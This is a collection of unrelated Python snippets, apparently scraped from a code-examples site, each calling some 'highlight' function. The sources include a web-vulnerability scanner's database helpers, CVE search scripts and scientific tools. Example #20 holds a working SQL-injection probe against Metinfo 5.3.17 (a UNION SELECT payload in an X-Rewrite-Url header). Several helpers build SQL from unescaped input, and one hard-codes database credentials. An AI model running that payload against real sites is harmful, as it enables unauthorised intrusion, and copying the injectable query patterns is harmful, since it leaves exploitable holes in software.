Example #1
def db_insert(table, args):
    """ Insert data into table

        Args:
            table: The name of the table
            args: The input content as a dict, e.g. {'exclusion':'google','update_time':'2017-03-10: 14:19'}

    """

    cols = []
    for key in args.keys():
        cols.append(key)
    sql = 'INSERT INTO `%s` (%s) VALUES (%s)' % (table, ','.join(
        ['`%s`' % col
         for col in cols]), ','.join(['?' for i in range(len(cols))]))
    sql = sql.replace('?', '%s')
    try:
        db = db_conn()
        cursor = db.cursor()
        cursor.execute(sql, args.values())
        db.commit()
        db.close()
        return True
    except Exception as e:
        print(highlight('[!] sql: {}, error: {}'.format(sql, str(e)), 'red'))
        return False
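
A minimal usage sketch for db_insert; the table and column names below are illustrative assumptions, not part of the original project:

# Hypothetical call: insert one exclusion record (table/column names are assumed).
ok = db_insert('exclusions', {
    'exclusion': 'google',
    'update_time': '2017-03-10 14:19',
})
if not ok:
    print('[!] insert failed, see the highlighted SQL error above')
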
Example #2
def db_update(table, args, cons):
    """ Update data in specific table with specific conditions

        Args:
            table: The name of the table
            args: The update content as a dict, e.g. {'exclusion':'google','update_time':'2017-03-10: 14:19'}
            cons: The conditions as a dict, e.g. {'id':'111'}

    """

    cols = []
    cols_cons = []
    values = []
    for k, v in args.items():
        cols.append(k)
        values.append(v)
    for k, v in cons.items():
        cols_cons.append(k)
        values.append(v)
    sql = 'UPDATE `%s` SET %s WHERE %s' % (table, ','.join(
        ['`%s`=?' % col
         for col in cols]), ','.join(['`%s`=?' % col for col in cols_cons]))
    sql = sql.replace('?', '%s')
    try:
        db = db_conn()
        cursor = db.cursor()
        cursor.execute(sql, values)
        db.commit()
        db.close()
        return True
    except Exception as e:
        print(highlight('[!] sql: {}, error: {}'.format(sql, str(e)), 'red'))
        return False
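
A matching usage sketch for db_update; again the table, column, and id values are assumptions for illustration only:

# Hypothetical call: update the record with id 111 (names and values are assumed).
ok = db_update('exclusions',
               {'exclusion': 'google', 'update_time': '2017-03-10 14:19'},
               {'id': '111'})
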
Example #3
def db_update(table, args, cons):
    """ Update data in specific table with specific conditions

        Args:
            table: The name of the table
            args: The update content as a dict, e.g. {'exclusion':'google','update_time':'2017-03-10: 14:19'}
            cons: The conditions as a dict, e.g. {'id':'111'}

    """

    cols = []
    cols_cons = []
    values = []
    for k,v in args.items():
        cols.append(k)
        values.append(v)
    for k,v in cons.items():
        cols_cons.append(k)
        values.append(v)
    sql = 'UPDATE `%s` SET %s WHERE %s' % (table, ','.join(['`%s`=?' % col for col in cols]), ','.join(['`%s`=?' % col for col in cols_cons]))
    sql = sql.replace('?', '%s')
    try:
        db = db_conn()
        cursor = db.cursor()
        cursor.execute(sql, values)
        db.commit()
        db.close()
        return True
    except Exception as e:
        print(highlight('[!] sql: {}, error: {}'.format(sql, str(e)), 'red'))
        return False
Example #4
def db_query(sql):
    try:
        db = db_conn()
        cursor = db.cursor()
        cursor.execute(sql)
        db.commit()
        db.close()
        query_result = cursor.fetchall()
        return query_result
    except Exception as e:
        print(highlight('[!] sql: {}, error: {}'.format(sql, str(e)), 'red'))
        return ''
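
db_query takes a raw SQL string and returns cursor.fetchall() (or '' on error), so callers simply iterate over rows; a small sketch, with an assumed requests table and columns:

# Hypothetical query against an assumed `requests` table with rid and url columns.
rows = db_query("SELECT rid, url FROM requests LIMIT 10")
for rid, url in rows:
    print(rid, url)
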
Example #5
def db_query(sql):
    try:
        db = db_conn()
        cursor = db.cursor()
        cursor.execute(sql)
        db.commit()
        db.close()
        query_result = cursor.fetchall()
        return query_result
    except Exception as e:
        print(highlight('[!] sql: {}, error: {}'.format(sql, str(e)), 'red'))
        return ''
Example #6
def db_conn():
    try:
        user = "******"
        pwd = "toor"
        hostname = "127.0.0.1"

        dbname = "nagascan"
        charset = "utf8"
        dbconn = MySQLdb.connect(user=user,passwd=pwd,host=hostname,db=dbname,charset=charset)
        return dbconn
    except Exception as e:
        print(highlight('[!] error: {}'.format(str(e)), 'yellow'))
        pass
Example #7
def search(keyword):
    db = DB(Config.dbOpts)
    sql = 'SELECT * FROM cve WHERE `desc` like "%%%s%%"' % keyword
    ret = db.select(sql)
    for kd in ret:
        print(kd[0])
        print(highlight(kd[1], keyword))
Example #8
def handle_input(thread, inport, q):
    for _ in range(5):
        thread.check_stopped()
        data = readline_from_port(inport)
        logging.info(f'enqueuing {repr(data)}')
        print(highlight(f'I PUT {repr(data)}', YELLOW))
        q.put(data)
Example #9
def search(opts):
    keyword = opts.search
    exclude = opts.exclude
    # excludes = exclude.split(",")
    # exclude = exclude.replace(",", "|")
    # print("exclude %s" % exclude)
    keywords = keyword.split(",")
    if keyword != "raw":
        sql = "SELECT `number`, `desc` FROM cve WHERE"
        for key in keywords:
            sql += '`desc` like "%%%s%%" and' % key
        sql = sql[:-4]
    else:
        sql = input("input your sql here:")
    # print(sql)
    db = DB(Config.dbOpts)
    ret = db.select(sql)
    for kd in ret:
        # for ex in excludes:
        # print(re.search(exclude, kd[1], re.IGNORECASE))
        if len(exclude) > 0 and re.search(exclude.replace(",", "|"), kd[1], re.IGNORECASE) is not None:
            continue
            # if ex in kd[1]:
        if opts.colorful:
            print(colored(kd[0], "yellow"))
            print(highlight(kd[1], keywords))
        else:
            print(kd[0])
            print(kd[1])
    print("\ntotal %d results with keywords: %s" % (len(ret), keyword))
Example #10
def db_conn():
    try:
        user = "******"
        pwd = "toor"
        hostname = "127.0.0.1"

        dbname = "nagascan"
        charset = "utf8"
        dbconn = MySQLdb.connect(user=user,
                                 passwd=pwd,
                                 host=hostname,
                                 db=dbname,
                                 charset=charset)
        return dbconn
    except Exception as e:
        print(highlight('[!] error: {}'.format(str(e)), 'yellow'))
        pass
Example #11
 def package_dependencies(self):
     lock_file_path = os.path.join(self.packrat_path, 'packrat.lock')
     if os.path.exists(lock_file_path):
         with open(lock_file_path) as f:
             lock_file_contents = f.read()
             return utils.highlight(lock_file_contents, TextLexer())
     else:
         return "No packrat.lock file found"
Example #12
 def package_dependencies(self):
     lock_file_path = os.path.join(self.packrat_path, 'packrat.lock')
     if os.path.exists(lock_file_path):
         with open(lock_file_path) as f:
             lock_file_contents = f.read()
         highlighted_lock_file_contents = utils.highlight(lock_file_contents,
                                                          TextLexer())
     else:
         highlighted_lock_file_contents = "<p>No lock file</p>"
     return highlighted_lock_file_contents
Example #13
def main():
  st.markdown("<h1 style='text-align: center; color: rgb(246, 51, 102);'>trackHN</h1>", unsafe_allow_html=True)	
  st.markdown("<p style='text-align: center;'>track HackerNews, with sense</p>",unsafe_allow_html=True)
  keyword = st.text_input("search keyword")
  context = st.text_area("sample text")
  st.write("give text having keyword in the needed context")
  search = st.button("go")



  if search:
    #check if keyword in sample text
    if(re.search(r'\b'+keyword+r'\b',context,flags=re.IGNORECASE)):
      model,tokenizer = load_model()
      #gets embedding for the keyword
      context_embed = word_embed(context, keyword, model, tokenizer)
      
      
      with st.spinner('searching...'):
        base_url = 'https://hacker-news.firebaseio.com/v0/' 
        end_url = '.json?print=pretty'
        ids_url = ''.join([base_url,category,'stories',end_url])
        #gets ids of 500 posts             
        ids = requests.get(ids_url) 
        for id in ids.json():
          url = ''.join([base_url,'item/',str(id),end_url])
          r = requests.get(url).json()
          if (r):
            if 'url' in r.keys():
              link = r['url']
              title = r['title']
              match = (re.search(r'\b'+keyword+r'\b',title,flags=re.IGNORECASE))
              if match:
                index = match.start() 
                #gets embedding for keyword in search result                                          
                title_embed = word_embed(title,keyword,model, tokenizer)        
                similarity=(1-cosine(context_embed,title_embed))
                if (similarity>threshold):
                  before = title[:index]
                  key = title[index:index+len(keyword)]
                  after = title[index+len(keyword):]
                  #calculate the intensity of keyword highlighting
                  h,s,l=highlight(similarity)                                   
                  
                  
                  #formatting output text                                
                  st.markdown("<style>.before{background-color:0;margin:0; display:inline;}</style>",unsafe_allow_html=True)
                  st.markdown("<style>.after{background-color:0;margin:0; display:inline;}</style>",unsafe_allow_html=True)
                  first = "<div><p class=before>{}</p><a style = 'background-color:".format(before)
                  st.markdown(first+"hsl({},{}%,{}%);'>{}</a><p class=after>{}</p></div>".format(h,s,l,key,after), unsafe_allow_html=True)
                  st.markdown("<a href={}>read more</a>".format(link),unsafe_allow_html=True)
    
    
    else:
      st.write('keyword missing in text')
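
The highlight(similarity) call above converts the cosine similarity into HSL components that control how strongly the matched keyword is tinted. Its implementation is not part of this snippet; a purely hypothetical sketch of such a mapping might look like this:

# Hypothetical sketch of a similarity-to-HSL mapping; the project's real highlight() may differ.
def similarity_to_hsl(similarity, threshold=0.4):
    h = 50                                                 # yellow-ish hue
    s = 100                                                # full saturation
    # stronger matches get a darker (more visible) background tint
    l = 100 - int((similarity - threshold) / (1 - threshold) * 50)
    return h, s, l
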
Example #14
def do_search(search, offset, nr_results=None):
    # look through database return limit number of pastes, print them
    if search is None:
        search = ""
    bool_search = search
    if nr_results is None:
        cursor.execute(
            """SELECT COUNT(*) FROM identifier WHERE category=%(search)s""",
            {'search': bool_search})
        nr_results = cursor.fetchall()[0][0]
        print html_escape(cursor.statement)
    sql_offset = offset * SC_PER_PAGE
    cursor.execute(
        """SELECT * FROM identifier INNER JOIN scrape ON identifier.scrape_id = scrape.id WHERE category=%(search)s ORDER by scrape_id DESC LIMIT %(sql_offset)s, %(SC_PER_PAGE)s""",
        {
            'search': bool_search,
            'sql_offset': sql_offset,
            'SC_PER_PAGE': SC_PER_PAGE
        })
    print html_escape(cursor.statement)
    result = cursor.fetchall()
    add_top_part(nr_results, offset, search)
    if nr_results == 0:
        return
    html = """<div class="container">"""
    html += """<table cellpadding="0" cellspacing="0" border="0" class="datatable table table-striped table-bordered" id="results">
    <thead>
    <tr>
        <th>Title</th>
        <th onclick="sortTableNumber(1)">Creation Date</th>
        <th> Raw Preview</th>
    </tr></thead>"""
    for (id1, scrape_id, category, nr_of_results, id2, scrape_url, full_url,
         date, paste_key, size, expire, title, syntax, raw) in result:
        if title == "":
            title = "Untitled"
        html += "<tr>\n"
        html += """<td> <a href="/cgi-bin/paste_inspection.py?id=%s" target="_blank">%s</a> </td>\n""" % (
            id2, title.encode('utf-8'))
        html += "<td data-ts=%s> %s </td>\n" % (
            int(date), datetime.datetime.fromtimestamp(
                int(date)).strftime('%d-%m-%Y %H:%M:%S'))
        raw1, raw2 = highlight(html_escape(raw.encode('utf-8')),
                               "",
                               identifier=search)
        if raw2 is not None:
            html += """<td> <p>%s</p> <p>%s</p> </td>\n""" % (raw1, raw2)
        else:
            html += """<td> <p>%s</p></td>\n""" % raw1
        html += "</tr>\n"
    html += "</table>\n"
    html += "</div>"
    print html
    add_bottom_part(search, offset, nr_results)
    print """<footer class="footer"> <div class="jumbotron text-center" style="margin-bottom:0">
Example #15
def handle_output(thread, q):
    while True:
        thread.check_stopped()
        data = q.get()
        if data is None:
            return
        logging.info(f'received {repr(data)}')
        logging.info(f'performing complicated algorithm on {repr(data)}')
        time.sleep(3)
        print(highlight(f'YOU GOT {data or "nothing"}', GREEN))
        q.task_done()
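
handle_input (Example #8) is the producer and handle_output the consumer of the same queue; the None sentinel and the task_done()/join() handshake can be exercised with a small sketch. A dummy stands in for the project's stoppable-thread object, and highlight/GREEN/logging come from the original module:

# Sketch only: exercising handle_output's queue handshake with a dummy thread object.
import queue
import threading

class _DummyThread:
    def check_stopped(self):
        pass              # the real thread object raises here when asked to stop

q = queue.Queue()
consumer = threading.Thread(target=handle_output, args=(_DummyThread(), q))
consumer.start()
q.put('hello')            # what handle_input would enqueue from the port
q.join()                  # wait until task_done() has been called for every item
q.put(None)               # None tells handle_output to return
consumer.join()
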
Example #16
def is_checked_vulnerable(rid, scan_result_type):
    """Check if the specific request has been detected as vulnerable before.

    Args:
        rid: The rid of the request
        scan_result_type: The scan result type for the request, e.g. result_xss, result_sqli

    Returns:
        True if the request was already found vulnerable, False otherwise.

    """

    try:
        sql = "SELECT COUNT(*) FROM requests where rid ='{}' and {} = 'vulnerable'".format(rid.strip(), scan_result_type)
        query_result = db_query(sql)
        count = [row[0] for row in query_result]
        if count[0] >= 1:
            return True
        else:
            return False
    except Exception as e:
        print(highlight('[!] {}'.format(str(e)), 'red'))
        return False
Example #17
def is_checked(rid, scan_type):
    """Check if the specific request has been checked before.

    Args:
        rid: The rid of the request
        scan_type: The scan type, e.g. scan_xss, scan_sqli

    Returns:
        True if the request was already checked, False otherwise.

    """

    try:
        sql = "SELECT COUNT(*) FROM requests where rid ='{}' and {} = 1".format(rid.strip(), scan_type)
        query_result = db_query(sql)
        count = [row[0] for row in query_result]
        if count[0] >= 1:
            return True
        else:
            return False
    except Exception as e:
        print(highlight('[!] {}'.format(str(e)), 'red'))
        return False
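
A short sketch of how these two checks could be combined before launching a scan; the rid value is assumed, and the scan-type/result-type names mirror the docstring examples:

# Hypothetical gatekeeping logic around a scan, using the two helpers above.
rid = 'some-request-id'                      # assumed value
if is_checked(rid, 'scan_xss'):
    already_vuln = is_checked_vulnerable(rid, 'result_xss')
    print('[*] rid {} already scanned for XSS, vulnerable: {}'.format(rid, already_vuln))
else:
    pass                                     # launch the XSS scan for this request here
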
Example #18
def db_insert(table, args):
    """ Insert data into table

        Args:
            table: The name of the table
            args: The input content as a dict, e.g. {'exclusion':'google','update_time':'2017-03-10: 14:19'}

    """

    cols = []
    for key in args.keys():
        cols.append(key)
    sql = 'INSERT INTO `%s` (%s) VALUES (%s)' % (table, ','.join(['`%s`' % col for col in cols]), ','.join(['?' for i in range(len(cols))]))
    sql = sql.replace('?', '%s')
    try:
        db = db_conn()
        cursor = db.cursor()
        cursor.execute(sql, args.values())
        db.commit()
        db.close()
        return True
    except Exception as e:
        print(highlight('[!] sql: {}, error: {}'.format(sql, str(e)), 'red'))
        return False
Example #19
def is_checked(rid, scan_type):
    """Check if the specific request has been checked before.

    Args:
        rid: The rid of the request
        scan_type: The scan type, e.g. scan_xss, scan_sqli

    Returns:
        True if the request was already checked, False otherwise.

    """

    try:
        sql = "SELECT COUNT(*) FROM requests where rid ='{}' and {} = 1".format(
            rid.strip(), scan_type)
        query_result = db_query(sql)
        count = [row[0] for row in query_result]
        if count[0] >= 1:
            return True
        else:
            return False
    except Exception as e:
        print(highlight('[!] {}'.format(str(e)), 'red'))
        return False
Example #20
    def verify(self, first=False):
        # Vulnerability verification method (mode=verify)
        target = self.scan_info.get("Target", "")    # Get the test target
        verbose = self.scan_info.get("Verbose", False)   # Whether to print verbose output

        # The PoC detection logic follows
        url = urljoin(target,'index.php?lang=Cn&index=1')
        payload = "1/2/zxxza' union select 1,2,3,md5(0x11),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#/index.php"
        headers = {
            "X-Rewrite-Url": payload
        }

        location = ""
        # Use req to send the HTTP request and handle the response; req is the TCC framework's unified wrapper around the requests HTTP methods, called as req(url, method, **kwargs) with the same parameters as requests
        resp = req(url, 'get', headers=headers, allow_redirects=False)
        if resp is not None:
            location = resp.headers.get("Location", "")

        if "47ed733b8d10be225eceba344d533586" in location:
            self.scan_info['Success'] = True    # The vulnerability exists; this field must be set to True (required)
            self.scan_info['Ret']['VerifyInfo']['URL'] = url    # Record some extra vulnerability-related information (optional)
            self.scan_info['Ret']['VerifyInfo']['DATA'] = "X-Rewrite-Url:" + payload
            if verbose:
                highlight('[*] Metinfo 5.3.17 X-Rewrite-url SQL Injection found')    # Print a highlighted message that the vulnerability was found; other available methods include info()/warn()/error()/highlight() for messages of different levels
Example #21
def is_checked_vulnerable(rid, scan_result_type):
    """Check if the specific request has been detected as vulnerable before.

    Args:
        rid: The rid of the request
        scan_result_type: The scan result type for the request, e.g. result_xss, result_sqli

    Returns:
        True if the request was already found vulnerable, False otherwise.

    """

    try:
        sql = "SELECT COUNT(*) FROM requests where rid ='{}' and {} = 'vulnerable'".format(
            rid.strip(), scan_result_type)
        query_result = db_query(sql)
        count = [row[0] for row in query_result]
        if count[0] >= 1:
            return True
        else:
            return False
    except Exception as e:
        print(highlight('[!] {}'.format(str(e)), 'red'))
        return False
Example #22
def cc(title: str, authors: str, file):
    with GoogleScholar() as gs:
        # Go to the article search page
        gs.search(title)
        if not gs.search_citations_of_the_1st_result():
            print(Fore.YELLOW + 'No citations found.')
            exit(0)

        # Iterate over every page; total: citations by others, totalnum: all articles
        page, total, totalnum = 0, 0, 0
        while True:

            page += 1
            print('-' * 10)
            print(Style.BRIGHT + Fore.GREEN + 'Page %d' % page)
            print('-' * 10)

            articles = gs.extract_articles_of_current_page()
            for i, cite in enumerate(articles):
                # valid = is_journal(cite)[0] and is_others(cite, authors)[0]
                valid = is_others(cite, authors)[0]
                cite = highlight(cite, authors)
                total += valid
                totalnum += 1

                message = [
                    Fore.BLUE,
                    Style.BRIGHT, '[%02d] %s\n' % (i + 1, cite.title),
                    Style.NORMAL, '     %s\n' % cite.url,
                    Style.NORMAL, '     %s\n' % cite.authors,
                    Style.NORMAL + Fore.YELLOW + '     %s\n' % cite.citations.get(EXPORT, 'Not Found.'),
                    Style.BRIGHT + Fore.MAGENTA + '     Good.\n' if valid else '',
                ]
                print(''.join(message))
                f.write("引用论文" + str(totalnum) + "\n")
                f.write(cite.citations.get(EXPORT, 'Not Found.') + "\n")
                f.write("引用出处【-】" + "\n")
                f.write("\n")
                f.write("\n")

            # arg = input('Valid citations %d, press ENTER or input NEW count: ' % total)
            # if arg.isdigit():
            #     total = int(arg)
            #     print('Update citations: %d' % total)
            if not gs.goto_next_page():
                break

    return total
Example #23
 def deployCrystfelGeometry(self, arg):
     self.findPsanaGeometry()
     if self.calibFile is not None and self.parent.writeAccess:
         # Convert psana geometry to crystfel geom
         if '.temp.geom' in self.parent.index.geom:
             self.parent.index.p9.param(self.parent.index.index_grp,
                                        self.parent.index.index_geom_str).setValue(
                 self.parent.psocakeRunDir + '/.temp.geom')
             cmd = ["psana2crystfel", self.calibPath + '/' + self.calibFile,
                    self.parent.psocakeRunDir + "/.temp.geom", str(self.parent.coffset)]
             if self.parent.args.v >= 1: print("cmd: ", cmd)
             try:
                 p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
                 p.communicate()[0]
                 p.stdout.close()
             except:
                 print(highlight("Warning! deployCrystfelGeometry() failed.", 'r', 1))
             # FIXME: Configure crystfel geom file to read in a mask (crystfel 'mask_file=' broken?)
             with open(self.parent.psocakeRunDir + '/.temp.geom', 'r') as f: lines = f.readlines()
             newGeom = []
             for line in lines: # remove commented out lines
                 if '; mask =' in line:
                     newGeom.append(line.split('; ')[-1])
                 elif '; mask_good =' in line:
                     newGeom.append(line.split('; ')[-1])
                 elif '; mask_bad =' in line:
                     newGeom.append(line.split('; ')[-1])
                 elif '; clen =' in line:
                     newGeom.append(line.split('; ')[-1])
                 elif '; photon_energy =' in line:
                     newGeom.append(line.split('; ')[-1])
                 elif '; adu_per_eV =' in line:
                     if 'epix10k' in self.parent.detInfo.lower() or \
                        'jungfrau4m' in self.parent.detInfo.lower():
                         newGeom.append(line.split('; ')[-1].split('0.1')[0]+"0.001") # override
                     else:
                         newGeom.append(line.split('; ')[-1])
                 else:
                     newGeom.append(line)
             with open(self.parent.psocakeRunDir + '/.temp.geom', 'w') as f:
                 f.writelines(newGeom)
     if self.parent.args.v >= 1: print("Done deployCrystfelGeometry")
Example #24
def img_line_detection(img, process):
    """Detect and highlignt lines in an image
    according to a processing class

    Inputs
    ------
    img :       an image
    process :   a processing class

    Output
    ------
    the image in which lines are highlighted
    """

    # Line detection
    temp = process.preprocessing(img)
    temp = process.edge_points_extraction(temp)
    lines = process.line_detection(temp)

    return highlight(img, lines)
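
img_line_detection only requires that process expose preprocessing, edge_points_extraction and line_detection; a hedged sketch of one possible implementation using OpenCV (the class name and parameter values are assumptions, and the project's real processing classes may differ):

# Illustrative only: one possible `process` implementation built on OpenCV.
import cv2
import numpy as np

class HoughProcess:
    def preprocessing(self, img):
        gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        return cv2.GaussianBlur(gray, (5, 5), 0)

    def edge_points_extraction(self, img):
        return cv2.Canny(img, 50, 150)

    def line_detection(self, edges):
        return cv2.HoughLinesP(edges, 1, np.pi / 180, threshold=80,
                               minLineLength=30, maxLineGap=10)

The highlight(img, lines) call then draws the detected segments back onto the image.
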
Example #25
def search(keyword, exclude):
    # excludes = exclude.split(",")
    # exclude = exclude.replace(",", "|")
    # print("exclude %s" % exclude)
    keywords = keyword.split(",")
    db = DB(Config.dbOpts)
    sql = 'SELECT `number`, `desc` FROM cve WHERE'
    for key in keywords:
        sql += '`desc` like "%%%s%%" and' % key
    sql = sql[:-4]
    # print(sql)
    ret = db.select(sql)
    for kd in ret:
        # for ex in excludes:
        # print(re.search(exclude, kd[1], re.IGNORECASE))
        if len(exclude) > 0 and re.search(exclude.replace(",", "|"), kd[1],
                                          re.IGNORECASE) is not None:
            continue
            # if ex in kd[1]:
        print(colored(kd[0], "yellow"))
        print(highlight(kd[1], keywords))
    print("\ntotal %d results with keywords: %s" % (len(ret), keyword))
Example #26
 def archived_file_contents_highlighted(self):
     contents = self.archived_file_contents()
     lexer = guess_lexer_for_filename(self.path, contents)
     contents_highlighted = utils.highlight(contents, lexer)
     return contents_highlighted
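
utils.highlight here (and in Examples #11/#12) is presumably a thin wrapper around Pygments; a minimal sketch of such a wrapper, offered only as an assumption about the project's utils module:

# Assumed shape of utils.highlight: Pygments code-to-HTML rendering.
import pygments
from pygments.formatters import HtmlFormatter

def highlight(contents, lexer):
    return pygments.highlight(contents, lexer, HtmlFormatter(noclasses=True))
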
Example #27
def do_search(search, identifier, offset, start, end, order_input, nr_results=None):
    # look through database return limit number of pastes, print them
    if identifier == "none":
        identifier = None
    if start is None:
        start_time = None
    else:
        start_time = to_unix(start)
    if end is None:
        end_time = None
    else:
        end_time = to_unix(end)
    if search is None:
        search = ""
    where = ""
    limit = "%(sql_offset)s, %(SC_PER_PAGE)s"
    if identifier is not None:
        table = "identifier INNER JOIN scrape ON identifier.scrape_id = scrape.id"
        select = "scrape_id, scrape_url, full_url, date, paste_key, size, expire, title, syntax, raw"
        order = get_order("scrape_id", order_input)
        where = add_to_where(where, "category=%(identifier)s")
    else:
        table = "scrape"
        order = get_order("id", order_input)
        select = "*"
    bool_search = "(\"" + search + "\")"
    if identifier is None:
        where = add_to_where(where, "MATCH(raw) AGAINST(%(search)s IN BOOLEAN MODE)")
    else:
        if search != "":
            where = add_to_where(where, "MATCH(raw) AGAINST(%(search)s IN BOOLEAN MODE)")
    tc = time_constraint(start_time, end_time)
    if tc is not None:
        where = add_to_where(where, tc)
    if nr_results is None:
        query = """SELECT COUNT(*) FROM %s WHERE %s""" % (table, where)
        cursor.execute(query,
        {'identifier': identifier, 'search': bool_search, 'start': start_time, 'end': end_time})
        nr_results = cursor.fetchall()[0][0]
    sql_offset = offset * SC_PER_PAGE
    query = """SELECT %s FROM %s WHERE %s ORDER by %s LIMIT %s""" % (select, table, where, order, limit)
    cursor.execute(query, {'identifier': identifier, 'search': bool_search, 'start': start_time, 'end': end_time, 'sql_offset': sql_offset, 'SC_PER_PAGE': SC_PER_PAGE})
    result = cursor.fetchall()
    add_top_part(nr_results, offset, search)
    if nr_results == 0:
        return
    html = """<div class="container">"""
    html += """<table cellpadding="0" cellspacing="0" border="0" class="datatable table table-striped table-bordered" id="results">
    <thead>
    <tr>
        <th>Title</th>
        <th>Creation Date</th>
        <th> Raw Preview</th>
    </tr></thead>"""
    for (id, scrape_url, full_url, date, paste_key, size, expire, title, syntax, raw) in result:
        if title == "":
            title = "Untitled"
        html += "<tr>\n"
        html += """<td> <a href="/cgi-bin/paste_inspection.py?id=%s" target="_blank">%s</a> </td>\n""" % (id, title.encode('utf-8'))
        html += "<td data-ts=%s> %s </td>\n" % (int(date), datetime.datetime.fromtimestamp(int(date)).strftime('%d-%m-%Y %H:%M:%S'))
        raw1, raw2 = highlight(html_escape(raw.encode('utf-8')), html_escape(search), identifier=identifier)
        if raw2 is not None:
            html += """<td> <p>%s</p> <p>%s</p> </td>\n""" % (raw1, raw2)
        else:
            html += """<td> <p>%s</p></td>\n""" % raw1
        html += "</tr>\n"
    html += "</table>\n"
    html += "</div> </div> </div>"
    print html
    add_bottom_part(search, offset, nr_results, start, end, order_input)
    print """<div class="footer"> <div class="jumbotron text-center" style="margin-bottom:0">
Example #28
    def run(self):
        if self.queue is None: # interactive indexing
            # Check if requirements are met for indexing
            if self.parent.pk.numPeaksFound >= self.minPeaks and \
                self.parent.pk.numPeaksFound <= self.maxPeaks and \
                self.parent.pk.peaksMaxRes >= self.minRes:
                print "OK, I'll index this pattern now"

                if self.parent.args.v >= 1: print "Running indexing!!!!!!!!!!!!"
                # Running indexing ...
                self.parent.index.numIndexedPeaksFound = 0
                self.parent.index.indexedPeaks = None
                self.parent.index.clearIndexedPeaks()
                self.parent.index.displayWaiting()

                # Write list of files to index
                with open(self.parent.index.hiddenCrystfelList, "w") as text_file:
                    text_file.write("{} //0".format(self.parent.index.hiddenCXI))

                # Generate a static mask of bad pixels for indexing
                self.parent.mk.saveCheetahStaticMask()

                # FIXME: convert psana geom to crystfel geom
                cmd = "indexamajig -j 1 -i " + self.parent.index.hiddenCrystfelList + " -g " + self.geom + " --peaks=" + self.peakMethod + \
                      " --int-radius=" + self.intRadius + " --indexing=" + self.indexingMethod + \
                      " -o " + self.parent.index.hiddenCrystfelStream + " --temp-dir=" + self.outDir + "/r" + str(
                      self.runNumber).zfill(4) + " --tolerance=" + str(self.tolerance)
                if self.pdb: cmd += " --pdb=" + self.pdb
                if self.extra:
                    _extra = self.extra.replace(",", " ")
                    cmd += " " + _extra

                print "cmd: ", cmd
                process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
                out, err = process.communicate()
                if 'command not found' in err:
                    print "######################################################################"
                    print highlight("FATAL ERROR: I can't find indexamajig on this machine. Refer to:      ",'r',1)
                    print highlight("https://confluence.slac.stanford.edu/display/PSDM/Psocake+SFX+tutorial",'r',1)
                    print "######################################################################"

                mySuccessString = "1 had crystals"
                # Read CrystFEL geometry in stream
                if mySuccessString in err:  # success
                    if self.parent.args.v >= 1: print "Indexing successful!"
                    # print "Munging geometry file"
                    f = open(self.parent.index.hiddenCrystfelStream)
                    content = f.readlines()
                    try:
                        for i, val in enumerate(content):
                            if '----- Begin geometry file -----' in val:
                                startLine = i
                            elif '----- End geometry file -----' in val:
                                endLine = i
                                break
                        geom = content[startLine:endLine]
                        numLines = endLine - startLine
                    except:
                        geom = content[0] # This shouldn't happen
                        numLines = 0
                    # Remove comments
                    for i in np.arange(numLines - 1, -1, -1):  # Start from bottom
                        if ';' in geom[i].lstrip(' ')[0]: geom.pop(i)

                    columns = ['min_fs', 'min_ss', 'max_fs', 'max_ss', 'res', 'fs', 'ss', 'corner_x', 'corner_y']
                    columnsScan = ['fsx', 'fsy', 'ssx', 'ssy']
                    indexScan = []
                    if self.parent.facility == self.parent.facilityLCLS:
                        if 'cspad' in self.parent.detInfo.lower():
                            numQuads = 4
                            numAsics = 16
                            for i in np.arange(numQuads):
                                for j in np.arange(numAsics):
                                    indexScan.append('q' + str(i) + 'a' + str(j))
                        elif 'rayonix' in self.parent.detInfo.lower():
                            numQuads = 1
                            numAsics = 1
                            for i in np.arange(numQuads):
                                    indexScan.append('p' + str(i))
                    elif self.parent.facility == self.parent.facilityPAL:
                        numQuads = 1
                        numAsics = 1
                        for i in np.arange(numQuads):
                            indexScan.append('p' + str(i))

                    dfGeom = pd.DataFrame(np.empty((numQuads * numAsics, len(columns))), index=indexScan,
                                          columns=columns)
                    dfScan = pd.DataFrame(np.empty((numQuads * numAsics, len(columnsScan))), index=indexScan,
                                          columns=columnsScan)
                    counter = 0
                    for i in np.arange(numQuads):
                        for j in np.arange(numAsics):
                            myAsic = indexScan[counter]
                            for k in columns:
                                myLine = [s for s in geom if myAsic + '/' + k in s]
                                if myLine:  # sometimes elements in columns can be missing
                                    myVal = myLine[-1].split('=')[-1].rstrip().lstrip()
                                    if k == 'fs' or k == 'ss':
                                        dfGeom.loc[myAsic, k] = myVal
                                    else:
                                        dfGeom.loc[myAsic, k] = float(myVal)
                                    if k == 'fs':
                                        fsx = float(myVal.split('x')[0])
                                        fsy = float(myVal.split('x')[-1].split('y')[0])
                                        dfScan.loc[myAsic, 'fsx'] = fsx
                                        dfScan.loc[myAsic, 'fsy'] = fsy
                                    elif k == 'ss':
                                        ssx = float(myVal.split('x')[0])
                                        ssy = float(myVal.split('x')[-1].split('y')[0])
                                        dfScan.loc[myAsic, 'ssx'] = ssx
                                        dfScan.loc[myAsic, 'ssy'] = ssy
                                else:
                                    if self.parent.args.v >= 1: print myAsic + '/' + k + " doesn't exist"
                            counter += 1
                    f.close()
                else:
                    if self.parent.args.v >= 1: print "Indexing failed"
                    self.parent.index.drawIndexedPeaks()

                # Read CrystFEL indexed peaks
                if mySuccessString in err:  # success
                    f = open(self.parent.index.hiddenCrystfelStream)
                    content = f.readlines()
                    for i, val in enumerate(content):
                        if 'End of peak list' in val:
                            endLine = i-1
                        elif 'num_saturated_peaks =' in val:
                            self.numSaturatedPeaks = int(val.split('=')[-1])
                        elif 'lattice_type =' in val:
                            self.latticeType = val.split('=')[-1]
                        elif 'centering =' in val:
                            self.centering = val.split('=')[-1]
                        elif 'unique_axis =' in val:
                            self.uniqueAxis = val.split('=')[-1]
                        elif 'fs/px   ss/px (1/d)/nm^-1   Intensity  Panel' in val:
                            startLine = i + 1
                        elif 'Cell parameters' in val:
                            (_, _, a, b, c, _, al, be, ga, _) = val.split()
                            self.unitCell = (a, b, c, al, be, ga)
                        elif 'diffraction_resolution_limit =' in val:
                            (_, _, _, _, _, resLim, _) = val.split() # Angstrom
                        elif 'End of reflections' in val:
                            endReflectionLine = i-1
                        elif '   h    k    l          I   sigma(I)       peak background  fs/px  ss/px panel' in val:
                            startReflectionLine = i+1
                    numPeaks = endLine-startLine
